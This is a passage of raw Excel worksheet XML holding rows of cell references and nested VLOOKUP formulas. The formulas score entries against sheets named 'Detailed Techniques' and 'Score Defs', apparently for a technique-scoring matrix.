        <f>IF(ISNA(VLOOKUP(VLOOKUP(M21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O21" s="3"/>
      <c r="P21" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q21" s="3"/>
      <c r="R21" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S21" s="8" t="s">
        <v>172</v>
      </c>
      <c r="T21" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V21" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="22" spans="1:22" ht="36" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A22" s="12" t="s">
        <v>112</v>
      </c>
      <c r="B22" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C22" s="12" t="s">
        <v>173</v>
      </c>
      <c r="D22" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E22" s="12" t="s">
        <v>174</v>
      </c>
      <c r="F22" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G22" s="8" t="s">
        <v>175</v>
      </c>
      <c r="H22" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I22" s="3"/>
      <c r="J22" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K22" s="3"/>
      <c r="L22" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M22" s="12" t="s">
        <v>176</v>
      </c>
      <c r="N22" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O22" s="3"/>
      <c r="P22" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q22" s="3"/>
      <c r="R22" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S22" s="3"/>
      <c r="T22" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V22" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U22,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="23" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A23" s="12" t="s">
        <v>177</v>
      </c>
      <c r="B23" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C23" s="12" t="s">
        <v>178</v>
      </c>
      <c r="D23" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E23" s="12" t="s">
        <v>179</v>
      </c>
      <c r="F23" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G23" s="3"/>
      <c r="H23" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I23" s="3"/>
      <c r="J23" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K23" s="3"/>
      <c r="L23" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M23" s="12" t="s">
        <v>180</v>
      </c>
      <c r="N23" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O23" s="3"/>
      <c r="P23" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q23" s="3"/>
      <c r="R23" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S23" s="3"/>
      <c r="T23" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V23" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U23,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="24" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A24" s="12" t="s">
        <v>43</v>
      </c>
      <c r="B24" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C24" s="8" t="s">
        <v>181</v>
      </c>
      <c r="D24" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E24" s="12" t="s">
        <v>182</v>
      </c>
      <c r="F24" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G24" s="3"/>
      <c r="H24" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I24" s="3"/>
      <c r="J24" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K24" s="3"/>
      <c r="L24" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M24" s="12" t="s">
        <v>139</v>
      </c>
      <c r="N24" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O24" s="3"/>
      <c r="P24" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q24" s="3"/>
      <c r="R24" s="3"/>
      <c r="S24" s="3"/>
      <c r="T24" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V24" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U24,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="25" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A25" s="12" t="s">
        <v>183</v>
      </c>
      <c r="B25" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C25" s="8" t="s">
        <v>150</v>
      </c>
      <c r="D25" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E25" s="12" t="s">
        <v>184</v>
      </c>
      <c r="F25" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G25" s="3"/>
      <c r="H25" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I25" s="3"/>
      <c r="J25" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K25" s="3"/>
      <c r="L25" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M25" s="12" t="s">
        <v>185</v>
      </c>
      <c r="N25" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O25" s="3"/>
      <c r="P25" s="3"/>
      <c r="Q25" s="3"/>
      <c r="R25" s="3"/>
      <c r="S25" s="3"/>
      <c r="T25" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V25" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U25,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="26" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A26" s="12" t="s">
        <v>186</v>
      </c>
      <c r="B26" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C26" s="8" t="s">
        <v>187</v>
      </c>
      <c r="D26" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E26" s="12" t="s">
        <v>75</v>
      </c>
      <c r="F26" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G26" s="3"/>
      <c r="H26" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I26" s="3"/>
      <c r="J26" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K26" s="3"/>
      <c r="L26" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M26" s="8" t="s">
        <v>188</v>
      </c>
      <c r="N26" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O26" s="3"/>
      <c r="P26" s="3"/>
      <c r="Q26" s="3"/>
      <c r="R26" s="3"/>
      <c r="S26" s="3"/>
      <c r="T26" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V26" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U26,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="27" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A27" s="12" t="s">
        <v>120</v>
      </c>
      <c r="B27" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C27" s="8" t="s">
        <v>189</v>
      </c>
      <c r="D27" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E27" s="12" t="s">
        <v>85</v>
      </c>
      <c r="F27" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G27" s="3"/>
      <c r="H27" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I27" s="3"/>
      <c r="J27" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K27" s="3"/>
      <c r="L27" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M27" s="8" t="s">
        <v>190</v>
      </c>
      <c r="N27" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O27" s="3"/>
      <c r="P27" s="3"/>
      <c r="Q27" s="3"/>
      <c r="R27" s="3"/>
      <c r="S27" s="3"/>
      <c r="T27" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V27" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U27,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="28" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A28" s="12" t="s">
        <v>191</v>
      </c>
      <c r="B28" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C28" s="8" t="s">
        <v>192</v>
      </c>
      <c r="D28" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E28" s="12" t="s">
        <v>193</v>
      </c>
      <c r="F28" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G28" s="3"/>
      <c r="H28" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I28" s="3"/>
      <c r="J28" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K28" s="3"/>
      <c r="L28" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M28" s="8" t="s">
        <v>194</v>
      </c>
      <c r="N28" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O28" s="3"/>
      <c r="P28" s="3"/>
      <c r="Q28" s="3"/>
      <c r="R28" s="3"/>
      <c r="S28" s="3"/>
      <c r="T28" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="V28" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U28,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="29" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A29" s="12" t="s">
        <v>127</v>
      </c>
      <c r="B29" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C29" s="8" t="s">
        <v>195</v>
      </c>
      <c r="D29" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E29" s="12" t="s">
        <v>196</v>
      </c>
      <c r="F29" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G29" s="3"/>
      <c r="H29" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="I29" s="3"/>
      <c r="J29" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I29,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K29" s="3"/>
      <c r="L29" s="5" t="str">
